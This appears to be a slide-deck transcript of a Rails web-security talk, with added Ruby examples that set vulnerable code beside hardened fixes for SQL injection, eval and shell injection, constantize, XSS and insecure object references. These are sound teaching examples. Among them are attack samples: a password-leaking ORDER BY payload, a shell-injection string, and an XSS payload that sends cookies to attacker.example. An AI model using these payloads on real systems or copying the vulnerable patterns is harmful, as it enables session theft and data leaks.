Slide 1
Slide 1 text
GOOD MORNING RUBYFUZA ☕
Slide 2
Slide 2 text
RUAN BRANDÃO SOFTWARE ENGINEER AT MAGNETIS (WE ARE HIRING) TWITTER TIMELINE CURATOR @RUANBRANDAO /RUAN-BRANDAO
Slide 3
Slide 3 text
Photo by Rafaela Biazi on Unsplash
Slide 4
Slide 4 text
São Paulo
Slide 5
Slide 5 text
Paulínia - São Paulo
Slide 6
Slide 6 text
Pipa - Rio Grande do Norte
Slide 7
Slide 7 text
Made in "
Slide 8
Slide 8 text
CYBER ATTACKS
Slide 9
Slide 9 text
A FIELD GUIDE FOR WEB VULNERABILITIES
Slide 10
Slide 10 text
THE WEB HTTP HTTPS TLS SSL Databases Servers Credentials TCP/IP DNS Clusters Cache Browsers
Slide 11
Slide 11 text
USING COMPONENTS WITH KNOWN VULNERABILITIES
Slide 12
Slide 12 text
No content
Slide 13
Slide 13 text
UPDATE YOUR APPLICATION DEPENDENCIES Security tip #1
Slide 14
Slide 14 text
INJECTION ‣ SQL ‣ NOSQL ‣ CODE ‣ COMMANDS
Slide 15
Slide 15 text
INJECTION VULNERABILITIES ALLOW ATTACKERS TO RUN CODE ON YOUR APPLICATION SERVERS
Slide 16
Slide 16 text
SQL INJECTION
Slide 17
Slide 17 text
XKCD, available at https://xkcd.com/327/
Slide 18
Slide 18 text
No content
Slide 19
Slide 19 text
BE CAREFUL WITH THE ORDER METHOD
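The slide's point is that ActiveRecord's `order` splices a String argument straight into the SQL, so `Model.order(params[:sort])` is an injection point just like a hand-built query. The following is an added example, not code from the talk; it uses plain Ruby and assembles the SQL as a string (no ActiveRecord) so the injected fragment is visible, and the helper names and column list are hypothetical.

```ruby
# Added example: ORDER BY built from user input, vulnerable and hardened.
# Plain Ruby; the SQL is a string so the injected fragment can be seen.

# Vulnerable: the caller's string is spliced into the query verbatim,
# which is what Model.order(params[:sort]) does with a String argument.
def unsafe_order_sql(sort_param)
  "SELECT * FROM users ORDER BY #{sort_param}"
end

# Hypothetical allowlist of columns the UI is allowed to sort by.
SORTABLE_COLUMNS = %w[name email created_at].freeze
DIRECTIONS       = %w[asc desc].freeze

# Hardened: only a known column name and direction reach the query;
# anything else raises instead of being passed through.
def safe_order_sql(sort_param, direction = "asc")
  column = sort_param.to_s
  dir    = direction.to_s.downcase
  raise ArgumentError, "unsortable column: #{sort_param.inspect}" unless SORTABLE_COLUMNS.include?(column)
  raise ArgumentError, "bad direction: #{direction.inspect}" unless DIRECTIONS.include?(dir)
  "SELECT * FROM users ORDER BY #{column} #{dir.upcase}"
end

if __FILE__ == $PROGRAM_NAME
  # Constructed attacker input: a valid column followed by an expression
  # that makes the sort order depend on another user's password hash,
  # leaking it one character at a time.
  evil = "name, (CASE WHEN (SELECT password_digest FROM users LIMIT 1) LIKE 'a%' THEN 1 ELSE 0 END)"
  puts unsafe_order_sql(evil)
  puts safe_order_sql("email", "DESC")
  begin
    safe_order_sql(evil)
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
end
```

In Rails the hash form `order(name: :desc)` quotes the identifier for you and is the first thing to reach for; an explicit allowlist like the one above is still needed whenever the column name itself comes from the request.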
Slide 20
Slide 20 text
CODE INJECTION & COMMAND INJECTION
Slide 21
Slide 21 text
BE EXTRA CAREFUL WITH EVAL AND BACKTICKS
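Both constructs hand user-controlled text to an interpreter: `eval` to Ruby itself, backticks to `/bin/sh`. The following added example (not from the talk; method names are hypothetical) shows each beside the replacement that keeps the input as data.

```ruby
# Added example: code injection via eval and command injection via
# backticks, each next to a replacement that never interprets the input.
require "open3"

# Vulnerable: eval runs whatever the string contains, so a numeric
# "amount" parameter is really arbitrary Ruby.
def unsafe_add(amount_param)
  eval("100 + #{amount_param}")
end

# Hardened: convert the input to the type you actually want. Integer()
# with an explicit base raises on anything that is not a whole number.
def safe_add(amount_param)
  100 + Integer(amount_param, 10)
end

# Vulnerable: interpolating into backticks passes the whole string to the
# shell, so ; | $( ) and friends become additional commands.
def unsafe_echo(name_param)
  `echo #{name_param}`
end

# Hardened: the multi-argument form of Open3.capture2 (like system with
# several arguments) skips the shell; each element is one literal argv
# entry, so metacharacters are just characters.
def safe_echo(name_param)
  out, _status = Open3.capture2("echo", name_param)
  out
end

if __FILE__ == $PROGRAM_NAME
  # Constructed attacker input for each case.
  p unsafe_add("3; :pwned")          # evaluates to :pwned, not a number
  p safe_add("3")                    # 103
  puts unsafe_echo("hi; echo injected")
  puts safe_echo("hi; echo injected")
end
```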
Slide 22
Slide 22 text
BE CAREFUL WITH CONSTANTIZE
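`constantize` turns any string into a constant lookup, so `params[:type].constantize` lets the client name any class loaded in the process, not just the handful you meant to offer. The added example below (not the talk's code) uses `Object.const_get`, which performs the same lookup for this purpose, so it runs without ActiveSupport; the exporter classes and method names are hypothetical.

```ruby
# Added example: user-chosen class names via const_get/constantize,
# and the allowlist that replaces it. Hypothetical classes.

class CsvExporter
  def run(user) = "csv for #{user}"
end

class JsonExporter
  def run(user) = "json for #{user}"
end

# Meant to be reachable only from an internal job, never from a request.
class AdminAuditExporter
  def run(user) = "every user's data, requested by #{user}"
end

# Vulnerable: resolves ANY constant the string names, including classes
# that were never meant to be user-selectable and core ones like Kernel.
def unsafe_exporter_for(type_param)
  Object.const_get(type_param) # what type_param.constantize does
end

# Hardened: the request picks a key, the application picks the class.
EXPORTERS = { "csv" => CsvExporter, "json" => JsonExporter }.freeze

def safe_exporter_for(type_param)
  EXPORTERS.fetch(type_param.to_s) do
    raise ArgumentError, "unknown export format: #{type_param.inspect}"
  end
end

if __FILE__ == $PROGRAM_NAME
  puts unsafe_exporter_for("AdminAuditExporter").new.run("attacker")
  puts safe_exporter_for("csv").new.run("alice")
  begin
    safe_exporter_for("AdminAuditExporter")
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
end
```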
Slide 23
Slide 23 text
CROSS SITE SCRIPTING (XSS)
Slide 24
Slide 24 text
CROSS SITE SCRIPTING ALLOWS ATTACKERS TO RUN CODE IN YOUR APPLICATION USERS' BROWSERS
Slide 25
Slide 25 text
No content
Slide 26
Slide 26 text
No content
Slide 27
Slide 27 text
No content
Slide 28
Slide 28 text
RAILS DOES THE HARD WORK
Slide 29
Slide 29 text
BE CAREFUL WITH THE RAW AND HTML_SAFE
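Rails escapes everything rendered with `<%= %>`; `raw` and `html_safe` switch that off for one value, which is exactly the hole XSS needs. The added example below (not the talk's code) reproduces the two behaviours with plain ERB and `ERB::Util.html_escape`, the same escaping Rails applies by default; the "bio" payload is a constructed sample.

```ruby
# Added example: default escaping versus raw/html_safe, in plain ERB.
require "erb"

# Constructed attacker-controlled profile text: an image tag whose
# onerror handler would ship the viewer's cookies to a third party.
EVIL_BIO = %(<img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">)

# What Rails does for <%= bio %>: entity-escape the value, so the
# browser shows the markup as text instead of executing it.
def render_bio_escaped(bio)
  ERB.new("<p><%= ERB::Util.html_escape(bio) %></p>").result_with_hash(bio: bio)
end

# The equivalent of <%= raw bio %> or <%= bio.html_safe %>: the string is
# trusted and inserted verbatim.
def render_bio_raw(bio)
  ERB.new("<p><%= bio %></p>").result_with_hash(bio: bio)
end

# Rough check used below: does the rendered page still contain a live
# tag from the input? (Not a sanitizer; only a demonstration aid.)
def contains_live_markup?(html)
  html.include?("<img") || html.include?("<script")
end

if __FILE__ == $PROGRAM_NAME
  puts render_bio_escaped(EVIL_BIO)
  puts render_bio_raw(EVIL_BIO)
end
```

If some user markup really must be rendered, run it through Rails' `sanitize` helper (an allowlist of tags and attributes) before marking it safe; `html_safe` on its own performs no cleaning at all, it only asserts that the string is already clean.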
Slide 30
Slide 30 text
NEVER TRUST USER INPUT Security tip #2
Slide 31
Slide 31 text
BROKEN ACCESS CONTROL
Slide 32
Slide 32 text
No content
Slide 33
Slide 33 text
No content
Slide 34
Slide 34 text
No content
Slide 35
Slide 35 text
No content
Slide 36
Slide 36 text
BE CAREFUL WITH ACCESS TO SENSITIVE DATA Security tip #3
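The most common broken-access-control bug in a Rails app is `Model.find(params[:id])` in a controller that never checks who owns the record: change the number in the URL and you read someone else's data. The added example below (not the talk's code) shows the unscoped lookup beside the owner-scoped one, with a tiny in-memory store standing in for ActiveRecord; the models, users and invoices are constructed.

```ruby
# Added example: insecure direct object reference and the scoped fix.
# A Struct array stands in for the database; all data is made up.
Invoice = Struct.new(:id, :owner_id, :total)
User    = Struct.new(:id, :name)

INVOICES = [
  Invoice.new(1, 10, 100),
  Invoice.new(2, 20, 250), # belongs to a different user
].freeze

class NotFound < StandardError; end

# Vulnerable: keyed only by the id the client sent, like
# Invoice.find(params[:id]); any logged-in user can enumerate ids.
def unsafe_show_invoice(_current_user, id_param)
  INVOICES.find { |inv| inv.id == Integer(id_param, 10) } or raise NotFound
end

# Hardened: look the record up through its owner, like
# current_user.invoices.find(params[:id]). A record the user does not
# own is indistinguishable from one that does not exist, so the
# response leaks nothing about other users' ids either.
def safe_show_invoice(current_user, id_param)
  INVOICES.find do |inv|
    inv.owner_id == current_user.id && inv.id == Integer(id_param, 10)
  end or raise NotFound
end

if __FILE__ == $PROGRAM_NAME
  alice = User.new(10, "alice")
  p unsafe_show_invoice(alice, "2") # someone else's invoice, returned anyway
  p safe_show_invoice(alice, "1")   # her own invoice
  begin
    safe_show_invoice(alice, "2")
  rescue NotFound
    puts "invoice 2: not found (for alice)"
  end
end
```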
Slide 37
Slide 37 text
BROKEN AUTHENTICATION
Slide 38
Slide 38 text
DO NOT REINVENT THE WHEEL. UNLESS YOU REALLY, REALLY KNOW WHAT YOU ARE DOING. Security tip #4
Slide 39
Slide 39 text
AND MUCH MORE… ‣ CROSS-SITE REQUEST FORGERY (CSRF) ‣ REMOTE CODE EXECUTION (RCE) ‣ SENSITIVE DATA EXPOSURE ‣ SECURITY MISCONFIGURATION
Slide 40
Slide 40 text
No content
Slide 41
Slide 41 text
Photo by Patrick Tomasso on Unsplash
Slide 42
Slide 42 text
https://owasp.org
Slide 43
Slide 43 text
No content
Slide 44
Slide 44 text
Photo by Barn Images on Unsplash
Slide 45
Slide 45 text
STATIC CODE ANALYSIS
Slide 46
Slide 46 text
No content
Slide 47
Slide 47 text
TOOLS STATIC CODE ANALYSIS TOOLS
Slide 48
Slide 48 text
TOOLS STATIC CODE ANALYSIS TOOLS
Slide 49
Slide 49 text
TOOLS STATIC CODE ANALYSIS TOOLS GitHub - Available at https://github.blog/2017-10-11-a-more-connected-universe/
Slide 50
Slide 50 text
SECURITY SCANNERS
Slide 51
Slide 51 text
TOOLS SECURITY SCANNER TOOLS http://www.arachni-scanner.com/
Slide 52
Slide 52 text
PENETRATION TESTS (PENTESTS)
Slide 53
Slide 53 text
SECURITY IS NOT A PRODUCT. SECURITY IS AN ONGOING PROCESS. Security tip #0
Slide 54
Slide 54 text
THANK YOU! ❤ @RUANBRANDAO /RUAN-BRANDAO